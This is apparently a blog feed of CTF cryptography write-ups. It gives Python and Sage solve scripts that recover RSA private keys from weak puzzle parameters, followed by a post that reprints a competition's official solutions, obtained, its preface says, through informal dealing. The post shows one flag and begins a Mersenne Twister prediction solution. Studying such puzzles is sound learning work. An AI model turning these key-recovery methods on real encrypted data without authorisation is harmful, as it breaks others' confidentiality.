7</span><br><span class="hljs-comment"># invert the leaked value so that 1314*p - 520*q == s, then solve that together with p*q == n</span><br>s = invert(s, n)<br>p = Symbol(<span class="hljs-string">'p'</span>)<br>q = Symbol(<span class="hljs-string">'q'</span>)<br>p, q = solve([p*q-n, <span class="hljs-number">1314</span>*p-<span class="hljs-number">520</span>*q-s], [p, q])[<span class="hljs-number">1</span>]<br>p = <span class="hljs-built_in">int</span>(p)<br>q = <span class="hljs-built_in">int</span>(q)<br>e = <span class="hljs-number">0x10001</span><br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n))))<br></code></pre></td></tr></table></figure><h4 id="rsa2"><a href="#rsa2" class="headerlink" 
title="rsa2"></a>rsa2</h4><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n = <span class="hljs-number">2387626545085756713585102877878108862015179080332961598635902226358817519910295819153349225103418927970241049968506375997</span><br>e = <span class="hljs-number">65537</span><br>c_mod_p = <span class="hljs-number">647648029783204084679833378591490303778808042166748545307033</span><br>c_mod_q = <span class="hljs-number">716978243624820144982668239669070880505037391756433243913335</span><br><span class="hljs-comment"># p and q are neighbouring primes, so walk down from isqrt(n) until p * next_prime(p) == n</span><br>p = iroot(n, <span class="hljs-number">2</span>)[<span class="hljs-number">0</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br>    p -= <span class="hljs-number">1</span><br>    <span class="hljs-keyword">if</span> is_prime(p):<br>        q = next_prime(p)<br>        <span class="hljs-keyword">if</span> p * q == n:<br>            <span class="hljs-keyword">break</span><br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span 
class="hljs-number">1</span>))<br><span class="hljs-comment"># only c mod p and c mod q were given: rebuild c mod n with the CRT, then decrypt as usual</span><br>c = (c_mod_p*invert(q, p)*q + c_mod_q*invert(p, q)*p) % n<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n))))<br></code></pre></td></tr></table></figure><h4 id="rsa3"><a href="#rsa3" class="headerlink" title="rsa3"></a>rsa3</h4><figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> random <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n = <span class="hljs-number">18896787369812506729161146792420582463075195289705130332145125441873359008259477778705050612028016445531171582699463469223129134497144553118164991259539504187512021208315754514545996574862689888723728779368278057158884309498791988824815380906489884221955569016913002047690134495021638325076324337204120358289197345473645253964897309936634674685256494467965994763346209088569312900310384221856890129638589708704488570062170587822159840004471847429651335596065845176922611177484979368701185198370143451554032097774883881063941164928195206151285053023900417539545188981446823285592433963817981924569149446287916824382561</span><br>d = <span class="hljs-number">5703031224919077324199739420591218709082873607810515782527403392203078685694557440606179655084946477198544985797529455998356213302699576058168444727748170549839026313064029609887624795981035801288838847172210685453187859645339376946854805971427795291607171515106310442975161667104581906887477593810523773846781119913091652230585316578697966956441025050411703279543735184615408372827086048067763849304020844971586419985599715291049252337301504847183917086038225366804009601071701854587257618991903027592792223359879103979050158387898497645317134119316587856020926045834487915948391807346208594166279941244305061329677</span><br>friend_keys = [<span class="hljs-number">111697</span>, <span class="hljs-number">106721</span>, <span class="hljs-number">116423</span>, <span class="hljs-number">88843</span>, <span class="hljs-number">119159</span>, <span class="hljs-number">70639</span>,<br><span class="hljs-number">80819</span>, <span class="hljs-number">74489</span>, <span class="hljs-number">121931</span>, <span class="hljs-number">101141</span>]<br>c = <span 
class="hljs-number">11994381627759026162899170243195205997473390753474105847444301599471367630328999329971554672898042711258332343414555886491105235450415874967500999777727188222201701790615800443999694661391161603608205580744046340685740132462956669428633202538875197708853419127000877908034155683418476839027176847825085191766500657063936087300707648173167638212184409940441341192494973780078520658057628747235702262261650533074207402665937459065342008813881483658655820794105733254390600096188629251786257035958039797032257689446780150685916517843665881340793492146980771808706103032498053602112046452376378597181639545983846067945876</span><br>e = <span class="hljs-number">0x10001</span><br><span class="hljs-comment"># factor n from (e, d): halve k = e*d - 1 while it is even and look for g^k - 1 sharing a factor with n</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">getpq</span>(<span class="hljs-params">n, e, d</span>):<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>        k = e * d - <span class="hljs-number">1</span><br>        g = randint(<span class="hljs-number">0</span>, n)<br>        <span class="hljs-keyword">while</span> k % <span class="hljs-number">2</span> == <span class="hljs-number">0</span>:<br>            k = k // <span class="hljs-number">2</span><br>            temp = <span class="hljs-built_in">pow</span>(g, k, n) - <span class="hljs-number">1</span><br>            <span class="hljs-keyword">if</span> gcd(temp, n) > <span class="hljs-number">1</span> <span class="hljs-keyword">and</span> temp != <span class="hljs-number">0</span>:<br>                <span class="hljs-keyword">return</span> gcd(temp, n)<br><br>p = getpq(n, e, d)<br>q = n // p<br><span class="hljs-comment"># the message was encrypted under each friend's exponent in turn; peel the layers off in reverse order</span><br>e = friend_keys[::-<span class="hljs-number">1</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> e:<br>    d = invert(i, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br>    c = <span class="hljs-built_in">pow</span>(c, d, n)<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(c)))<br></code></pre></td></tr></table></figure><h4 id="rsa4"><a href="#rsa4" class="headerlink" title="rsa4"></a>rsa4</h4><figure class="highlight python"><table><tr><td 
class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br>n = <span class="hljs-number">18344208622226145563275332631675852812637974117269410580356372484730868630041087771967863177399468436907179629991713287958712918155881322973807806301979120718337971766642141160715457959104230009865832490334268400708057378872793969706058766934173901720807601381260226109710528613914848911497044918273137096903522367120819016923613011696956531078735040866726836147244627617752866449680818575750555372925099203864465221467261643732258403282300830500857008951036100240417305652712966271750963365056888669691476588673457169183575547654173584411488289083479722447529687480093984214874840116386641308648928664471249163053399</span><br>c = <span class="hljs-number">5799835212682670854600787421394304700766812650929331808305024781919809808414116741938033087654173522429848434831011913540857883976763801585735031494044357475999623804769581806159695530735320829983994397494910262812269266183428964227240479098342185016875916463463869275180539449912347431388217372994987664171819970167145891087464365899986673967607036447794731478364868669512779723692729123522060403205286021628536236794321362684707698114447595523828110511521587142146690874947566042115081767036515192408523157587036063428678576881221634685127738856946514330198100929281963428110917369571549814920857266365740708152342</span><br>e = <span class="hljs-number">0x10001</span><br><span class="hljs-comment"># the ciphertext is a multiple of one prime factor, so gcd(n, c) yields p directly</span><br>p = gcd(n, c)<br>q = n // p<br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br><span class="hljs-comment"># the decrypted value is the message times p*2021*1211; divide those factors back out</span><br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n) // p // <span class="hljs-number">2021</span> // <span class="hljs-number">1211</span>)))<br></code></pre></td></tr></table></figure><h4 id="rsa5"><a href="#rsa5" class="headerlink" title="rsa5"></a>rsa5</h4><figure class="highlight python"><table><tr><td 
class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n = <span class="hljs-number">89114498420780604917531033169596392769455738343415866175560827716329038325885040230287167130153562721085218031290598924393710777384195303868086861588496841776165960494754159665639269842671254641757507534815336115279112577992964099982530678699389798633559364922445110277096686903849847611549099340416648410741</span><br>c1 = <span class="hljs-number">57359521416425004889574384286954390357578447076187041826554998430278569393110707558159548160722488167125261377926780925450037910946326495496458789517073846838572127994188947841144323050661878529991194216905874570654668399647160693111399370992860273469440588961499188834128185367804403864368930212475453509851</span><br>c2 = <span class="hljs-number">836612803701856474484530054607170668909910001884273264050010969359023715667241812072726592738016216398866914801553640098315936954666777838655959716451005363698018156193371297668239384633381285547169</span><span 
class="hljs-number">700368179528705698222083265831417459305574539697953348924935249748</span><br><span class="hljs-number">70629590649696998539807821542822600655060074</span><br>e1 = <span class="hljs-number">65536</span><br>e2 = <span class="hljs-number">270270</span><br>s = gcdext(e1, e2)<br>s1 = s[<span class="hljs-number">1</span>]<br>s2 = s[<span class="hljs-number">2</span>]<br><span class="hljs-keyword">if</span> s1 < <span class="hljs-number">0</span>:<br> s1 = -s1<br> c1 = invert(c1, n)<br><span class="hljs-keyword">elif</span> s2 < <span class="hljs-number">0</span>:<br> s2 = -s2<br> c2 = invert(c2, n)<br>m = <span class="hljs-built_in">pow</span>(c1, s1, n) * <span class="hljs-built_in">pow</span>(c2, s2, n) % n<br>m = iroot(m, gcd(e1, e2))[<span class="hljs-number">0</span>]<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(m)))<br></code></pre></td></tr></table></figure><h4 id="rsa6"><a href="#rsa6" class="headerlink" title="rsa6"></a>rsa6</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span 
class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># sage</span><br><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><br>c =<br><span class="hljs-number">792534797236942516602405443517723052170140376689765593638997623833</span><br><span class="hljs-number">525502332370366568752423701218537804193723719392319671016105315635</span><br><span class="hljs-number">523406644164531971118370184232962015770416637115765071722283961964</span><br><span class="hljs-number">827115212868237291312609636578368752056498293716848478808131767547</span><br><span class="hljs-number">446308313278458238418750786925588522885746781783147603597170544986</span><br><span class="hljs-number">208068994799423044583975977509062978092895646925325128691641745565</span><br><span class="hljs-number">565104807528491490973536526192938132172849121017114953492710063898</span><br><span class="hljs-number">844399695122256742298334030165735207100449171055079117496974415925</span><br><span class="hljs-number">167478748602909845452507560308635453872490997120605713695943364490</span><br><span class="hljs-number">553428102487682775669613775497156017316624305860430262666205570472</span><br><span class="hljs-number">621762251045983266546589262742077056901761505758616282139860180520</span><br><span class="hljs-number">294114130199610630948384554435331068898512856688812062730461978896</span><br><span class="hljs-number">550717296237834283267302523654274510531108136128918294741736300869</span><br><span 
class="hljs-number">899449462228229808281574649010180112666932831903406027085633419430</span><br>025271852343210666327353337433569778504453080170055493551867512226<br><span class="hljs-number">748755362216403339448564059716305656384237185703151486523517715746</span><br><span class="hljs-number">219841327983087970570848592955861083128624324922914558382778188473</span><br><span class="hljs-number">508354381883997155444299428898747384287358825771965832858103389182</span><br><span class="hljs-number">2672997846833635917945202914668666249069209</span><br>N =<br><span class="hljs-number">327704199063655154339194866047748377300483661546348646619543042402</span><br><span class="hljs-number">260458534101350044000928583250118734194187256215886625771489682622</span><br><span class="hljs-number">806492392158515139856977282405831771426953889407535449903946471081</span><br><span class="hljs-number">769989651651591222623997395529035591781660724645156930487601579241</span><br><span class="hljs-number">488206427939500937938255588575188735472745545946966631822161787569</span><br><span class="hljs-number">690670592431700668322671046133380934851245111908808167859798212265</span><br><span class="hljs-number">435088714280150547423032692815776965063410936310739819923896759441</span><br><span class="hljs-number">335001874930520763236975226711207654895127866843378461328154795776</span><br><span class="hljs-number">319242290600812698882674645791266238574096744538101900116337068936</span><br><span class="hljs-number">957681128459670057096430909525261047967406584507167977208793797870</span><br><span class="hljs-number">831858199445206260549902066723878612723426168458993576999172766781</span><br><span class="hljs-number">960053959813246897054556640370355234535221471564607870502627719243</span><br><span class="hljs-number">185861171079980645221020435603883953809425799723857745727457620742</span><br><span 
class="hljs-number">919434348781413514988026742127568571934186958953140598517500511323</span><br>011929458037325804993377002532922851586492715993738894057370890612<br><span class="hljs-number">824581248076082409851337738126905208244299232520865145447167051764</span><br><span class="hljs-number">102587067960512092944943632792165293701233755265831135001570237083</span><br><span class="hljs-number">525408605939160927853199431652266761149838259483979450360702066085</span><br><span class="hljs-number">191758469080084577999970704509262494734276631</span><br><span class="hljs-number">5</span><br>e1 =<br><span class="hljs-number">113093816717144841270493376736752441673022256694148583901036760385</span><br><span class="hljs-number">290294469429291287395932962657459627279948131588586212784590640516</span><br><span class="hljs-number">333875415213429718659370434377813079419901793552309461703882586527</span><br><span class="hljs-number">503420999488191213528380154291270445702806410792319417099800769397</span><br><span class="hljs-number">301837093257916765727595155732721396733301006197816845511287287300</span><br><span class="hljs-number">240373894663383088203656193754454195781571647148298850615901090657</span><br><span class="hljs-number">526494250418115895409707363373152838151538570469978232752856573089</span><br><span class="hljs-number">149548109243765929129792122940993776991512134978235283946198861884</span><br><span class="hljs-number">114007985343254462515565194689101887047325062995222232830812585485</span><br><span class="hljs-number">386335674066695574712424013748788932584416194906037669948036361191</span><br><span class="hljs-number">560447424191340446408227050317480535979753006991332324053550385053</span><br><span class="hljs-number">870295648784077492339350541225982286056281016618014141105366605422</span><br><span class="hljs-number">149895221611592416532345771815704307846206281439784932410973601384</span><br><span 
class="hljs-number">402414039900782254330313269415078960064305344681778478762050176778</span><br><span class="hljs-number">461863907418405687378915582516510150832198276943089812715818203025</span><br><span class="hljs-number">913800315465878924192853193803827276622946514235810979197716378589</span><br><span class="hljs-number">261982901063684489176009723390727783448898996904743318965120718829</span><br><span class="hljs-number">513279206531437783722261301609689797505310206968838386508504975439</span><br><span class="hljs-number">758618002450017650730285740872724819939789165</span><br><span class="hljs-number">6</span><br>e2 =<br><span class="hljs-number">520784802242233176685694625439335648020233315036318660607609058232</span><br><span class="hljs-number">253756893711940811689671211031740538418030746960229830407033429274</span><br><span class="hljs-number">724173761594060357040912794702362534613844927042210511917607360605</span><br><span class="hljs-number">543444697905470318310052804430718259068491360683455456766060272908</span><br><span class="hljs-number">336208271643139931316184313237522767343589523009450774630417666521</span><br><span class="hljs-number">249374919345775996757611711031293044212158686999046988150214592108</span><br><span class="hljs-number">157111459059701972034578216909910625389552085786113690770133454547</span><br><span class="hljs-number">457764623704458887788524087623286723476033810982968611147489646670</span><br><span class="hljs-number">169496808853835334718258960849680027392565778520201820536838989790</span><br><span class="hljs-number">882852419430752827631200573362834437858845826550336938550475796906</span><br><span class="hljs-number">207139877232034439683439393971802337498729658644929705383526075801</span><br><span class="hljs-number">274333885777281973827854475388302632779455717147494603818517391466</span><br><span class="hljs-number">719503054220543434394727883299649591903578031268240738900411112406</span><br><span 
class="hljs-number">618652725850847223731909368279406071589358172777730956937781876825</span><br><span class="hljs-number">949576871569149291236837622348525849820772458720098637391873811567</span><br><span class="hljs-number">556867266331105515676590090610339970832411635514893234739688540601</span><br>082980853279295821658846621558746399768293470665616360020175164850<br>074194164460647394129842296631518274348500179159711083883316628656<br><span class="hljs-number">10040555809970494140145365617095067391830661</span><br>a = <span class="hljs-number">0.198</span> <span class="hljs-comment"># 811./4097</span><br>M1 = N**<span class="hljs-number">0.5</span><br>M2 = N**(a + <span class="hljs-number">1</span>)<br>D = diagonal_matrix(ZZ, [N, M1, M2, <span class="hljs-number">1</span>])<br>M = matrix(ZZ, [[<span class="hljs-number">1</span>, -N, <span class="hljs-number">0</span>, N**<span class="hljs-number">2</span>], [<span class="hljs-number">0</span>, e1, -e1, -e1 * N], [<span class="hljs-number">0</span>, <span class="hljs-number">0</span>,<br>e2, -e2 * N],<br> [<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, e1 * e2]]) * D<br>L = M.LLL()<br>t = vector(ZZ, L[<span class="hljs-number">0</span>])<br>x = t * M**(-<span class="hljs-number">1</span>)<br>phi = <span class="hljs-built_in">int</span>(x[<span class="hljs-number">1</span>] / x[<span class="hljs-number">0</span>] * e1)<br>d = inverse(<span class="hljs-number">0x10001</span>, phi)<br>m = <span class="hljs-built_in">pow</span>(c, d, N)<br><span class="hljs-built_in">print</span>(long_to_bytes(m))<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>The 6th "Chuhui Cup" Official Write-up</title>
<link href="/2021/12/07/%E7%AC%AC%E5%85%AD%E5%B1%8A%E2%80%9C%E6%A5%9A%E6%85%A7%E6%9D%AF%E2%80%9D%E5%AE%98%E6%96%B9Write-up/"/>
<url>/2021/12/07/%E7%AC%AC%E5%85%AD%E5%B1%8A%E2%80%9C%E6%A5%9A%E6%85%A7%E6%9D%AF%E2%80%9D%E5%AE%98%E6%96%B9Write-up/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>Since my school was the organizer of this competition, I obtained the competition's write-up without trouble after some under-the-table dealing between me and the president of the Information Security Association. Reposting or publishing it without my authorization is prohibited!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main Text</h2><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><h4 id="Easy-RSA"><a href="#Easy-RSA" class="headerlink" title="Easy-RSA"></a>Easy-RSA</h4><p>Just let sympy solve the system of equations in one go.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sympy <span class="hljs-keyword">import</span> Symbol, solve<br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n = <span 
class="hljs-number">27552304606229034903366058815849954030287648695063385362955432137790872571412035824128918674719247737295565001575991597519270789776408208970323808016733976338433371328100880898942106515627607388226912870981180215883273805491209461671730377099185278711453949265641966582563910708529619185885928310168288810488784242368160743359666583499117949407921812317700250240067929572558785431071173411100434109661677786734923283679392823901052633992456780285091988542875991410528415886437666510014123352497264017734716859350294159440761760921548702546470902740121962033241003215821780125194400741190925169397917247376657863011603</span><br>e = <span class="hljs-number">65537</span><br>c = <span class="hljs-number">8643831704675414121804983915084443744489969712473300784256427784417167322852556975560503484179280700293119974607254037642425650493676448134024809335297135239994950178868535219541095694358323044214971760829173918774094415933808417722001811285178546917655837402000771685507972240389565704149610032767242977174132826100177368764169367458684152505611469248099487912367364804360878611296860803835816266114046682291529593099394952245852157119233687981777202751472502060481232341206366584532964027749320641690448228420342308891797513656897566100268729012788419021059054907653832828437666012596894150751431936476816983845357</span><br>s = <span class="hljs-number">3216514606297172806828066063738105740383963382396892688569683235383985567043193404185955880509592930874764682428425994713750665248099953457550673860782324431970917492727256948066013701406000049963109681898567026552657377599263519201715733179565306750754520746601394738797021362510415215113118083969304423858</span><br><span class="hljs-comment"># p = Symbol('p')</span><br><span class="hljs-comment"># q = Symbol('q')</span><br><span class="hljs-comment"># p, q = solve([p*q-n, p-q-s], [p,q])</span><br><span class="hljs-comment"># print(p,q)</span><br>p = <span 
class="hljs-number">167604917202624171205562332547086795459018271995531662202392816766661852499967774267554085060619750182533064588995245441659492248123164548905239665224600839192261379211031757557080502863539123811164713057605073461933854926502162793803096063035806777877263036653498763650955936640215477205393488552237210705691</span><br>q = <span class="hljs-number">164388402596326998398734266483348689718634308613134769513823133531277866932924580863368129180110157251658299906566819446945741582875064595447688991363818514760290461718304500609014489162133123761201603375706506435381197548902899274601380329856241471126508515906897368912158915277705061990280370468267906281833</span><br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c,d,n))))<br><span class="hljs-comment"># b'flag{9c0532a253809f180747b6da334b438f}'</span><br></code></pre></td></tr></table></figure><h4 id="EasyRandom"><a href="#EasyRandom" class="headerlink" title="EasyRandom"></a>EasyRandom</h4><p>First, use MT19937 pseudo-random number prediction to recover the two numbers that get XORed. Because tmp is urandom(3) and its sha256 digest is also given, the value of tmp can be recovered by brute force. After the XOR we obtain the value (n1<<64)+(n2<<40)+n3, and from the bit lengths we can see that the three parts are exactly staggered. Take the low 40 bits as n3 and brute-force the affine cipher to get the last ten hex digits of the flag. Take the middle segment as n2 and XOR it with tmp to get the middle 6 hex digits of the flag. XOR the leading segment to get the first 32 hex digits of the flag. Concatenate the three parts and apply n2s to obtain the final flag.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs python">randist=[<span class="hljs-number">3693014292</span>, <span class="hljs-number">1999090277</span>, <span class="hljs-number">2812362804</span>, <span class="hljs-number">2118249952</span>, <span class="hljs-number">885988212</span>, <span class="hljs-number">1131999143</span>, <span 
class="hljs-number">3327925205</span>, <span class="hljs-number">731275596</span>, <span class="hljs-number">1818780432</span>, <span class="hljs-number">644434032</span>, <span class="hljs-number">3301077903</span>, <span class="hljs-number">1004325730</span>, <span class="hljs-number">113617890</span>, <span class="hljs-number">262927352</span>, <span class="hljs-number">1449581419</span>, <span class="hljs-number">1596910105</span>, <span class="hljs-number">3680959953</span>, <span class="hljs-number">4039323321</span>, <span class="hljs-number">2422810127</span>, <span class="hljs-number">946521915</span>, <span class="hljs-number">4049336142</span>, <span class="hljs-number">1299247828</span>, <span class="hljs-number">3361233447</span>, <span class="hljs-number">1319347681</span>, <span class="hljs-number">2858084207</span>, <span class="hljs-number">2493466845</span>, <span class="hljs-number">522894151</span>, <span class="hljs-number">3272590535</span>, <span class="hljs-number">2518746559</span>, <span class="hljs-number">113976089</span>, <span class="hljs-number">1912521614</span>, <span class="hljs-number">1971657011</span>, <span class="hljs-number">4052443472</span>, <span class="hljs-number">1928327357</span>, <span class="hljs-number">1481517158</span>, <span class="hljs-number">1707968618</span>, <span class="hljs-number">3946904293</span>, <span class="hljs-number">3941277234</span>, <span class="hljs-number">1740669853</span>, <span class="hljs-number">177473759</span>, <span class="hljs-number">2855945159</span>, <span class="hljs-number">3217808064</span>, <span class="hljs-number">568887441</span>, <span class="hljs-number">2243547768</span>, <span class="hljs-number">533475147</span>, <span class="hljs-number">4005163087</span>, <span class="hljs-number">1991762580</span>, <span class="hljs-number">1175403787</span>, <span class="hljs-number">1819485104</span>, <span class="hljs-number">4162426193</span>, <span 
class="hljs-number">2480060730</span>, <span class="hljs-number">1889558541</span>, <span class="hljs-number">1659122908</span>, <span class="hljs-number">2343813603</span>, <span class="hljs-number">1792751594</span>, <span class="hljs-number">3287109162</span>, <span class="hljs-number">4119020356</span>, <span class="hljs-number">2086904766</span>, <span class="hljs-number">4227102603</span>, <span class="hljs-number">4251617926</span>, <span class="hljs-number">386544361</span>, <span class="hljs-number">2024596798</span>, <span class="hljs-number">3275172220</span>, <span class="hljs-number">1652143183</span>, <span class="hljs-number">4279693598</span>, <span class="hljs-number">1741714555</span>, <span class="hljs-number">3920640884</span>, <span class="hljs-number">837190820</span>, <span class="hljs-number">4242688797</span>, <span class="hljs-number">3406136725</span>, <span class="hljs-number">272163458</span>, <span class="hljs-number">1933729342</span>, <span class="hljs-number">3348914742</span>, <span class="hljs-number">3483202044</span>, <span class="hljs-number">313505665</span>, <span class="hljs-number">3180958891</span>, <span class="hljs-number">276638359</span>, <span class="hljs-number">2247257889</span>, <span class="hljs-number">1283002827</span>, <span class="hljs-number">253470155</span>, <span class="hljs-number">2172073971</span>, <span class="hljs-number">3333335918</span>, <span class="hljs-number">321125332</span>, <span class="hljs-number">3478202657</span>, <span class="hljs-number">1298557332</span>, <span class="hljs-number">1255183068</span>, <span class="hljs-number">2347216752</span>, <span class="hljs-number">1823003608</span>, <span class="hljs-number">1873938039</span>, <span class="hljs-number">4172493668</span>, <span class="hljs-number">1252876713</span>, <span class="hljs-number">2877329304</span>, <span class="hljs-number">2733470437</span>, <span class="hljs-number">743814046</span>, <span 
class="hljs-number">1482554102</span>, <span class="hljs-number">3967801003</span>, <span class="hljs-number">4135521914</span>, <span class="hljs-number">1601509876</span>, <span class="hljs-number">1370623470</span>, <span class="hljs-number">564556001</span>, <span class="hljs-number">3369378190</span>, <span class="hljs-number">1930652933</span>, <span class="hljs-number">2684027015</span>, <span class="hljs-number">730072119</span>, <span class="hljs-number">3133537560</span>, <span class="hljs-number">554522157</span>, <span class="hljs-number">4200260396</span>, <span class="hljs-number">66286223</span>, <span class="hljs-number">2856462351</span>, <span class="hljs-number">3409097597</span>, <span class="hljs-number">1123352314</span>, <span class="hljs-number">3112249875</span>, <span class="hljs-number">660537433</span>, <span class="hljs-number">1027164908</span>, <span class="hljs-number">2875953843</span>, <span class="hljs-number">3419766147</span>, <span class="hljs-number">64818752</span>, <span class="hljs-number">1572659846</span>, <span class="hljs-number">176068922</span>, <span class="hljs-number">2155262681</span>, <span class="hljs-number">3154282688</span>, <span class="hljs-number">3215591301</span>, <span class="hljs-number">923444143</span>, <span class="hljs-number">54743986</span>, <span class="hljs-number">3011602372</span>, <span class="hljs-number">1936525684</span>, <span class="hljs-number">2636863705</span>, <span class="hljs-number">3228231549</span>, <span class="hljs-number">3660514246</span>, <span class="hljs-number">2503374986</span>, <span class="hljs-number">1180875896</span>, <span class="hljs-number">941948277</span>, <span class="hljs-number">1922552596</span>, <span class="hljs-number">740696852</span>, <span class="hljs-number">2337729160</span>, <span class="hljs-number">1636823570</span>, <span class="hljs-number">1788245610</span>, <span class="hljs-number">2970204367</span>, <span 
